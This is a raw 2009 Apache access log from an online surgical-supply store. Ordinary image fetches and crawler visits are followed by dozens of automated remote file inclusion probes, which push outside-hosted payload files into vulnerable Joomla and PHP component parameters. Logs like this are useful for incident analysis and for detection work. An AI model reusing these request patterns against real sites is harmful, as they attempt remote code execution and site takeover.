134.58.253.57 - - [24/Jun/2009:05:19:27 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:27 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:28 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:29 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:31 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:31 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:31 -0400] "GET /images/items/NUOSSCOLLAGEN_THUMB.JPG HTTP/1.1" 200 2818 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:31 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:32 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:32 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:32 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:32 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:33 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
116.121.201.70 - - [24/Jun/2009:05:20:26 -0400] "GET /logs/error_log.Q108072200%20%20/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.232.4.1 - - [24/Jun/2009:05:20:35 -0400] "GET /logs/access_log.Q109051600/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
124.138.156.3 - - [24/Jun/2009:05:20:36 -0400] "GET //include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:20:36 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:20:36 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:20:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461F2304001AC0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.38.128.43 - - [24/Jun/2009:05:20:51 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:20:51 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:20:52 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:05:21:04 -0400] "GET /images/_notes/home_connect_off.jpg.mno HTTP/1.0" 200 252 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.206.120.187 - - [24/Jun/2009:05:23:21 -0400] "GET /logs/access_log.Q109052600///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:23:21 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:23:21 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 6784 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:23:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.210.29.135 - - [24/Jun/2009:05:23:34 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:23:34 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:23:34 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:23:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461F43C4001FC0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:05:23:36 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:05:23:44 -0400] "GET /logs/access_log.Q109052000%20%20///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:23:45 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:08 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:08 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:08 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:05:24:08 -0400] "GET /images/_notes/download_tut_tissue.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.94.80.27 - - [24/Jun/2009:05:24:09 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:10 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:10 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:12 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:13 -0400] "GET /logs/access_log.Q109052500%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:24:14 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:20 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:20 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:21 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:22 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:45 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:46 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:47 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:47 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:47 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:24:47 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:24:58 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
